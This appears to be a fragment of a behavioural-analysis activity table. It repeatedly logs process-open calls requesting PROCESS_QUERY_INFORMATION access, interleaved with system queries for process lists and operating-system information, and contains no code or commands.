|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
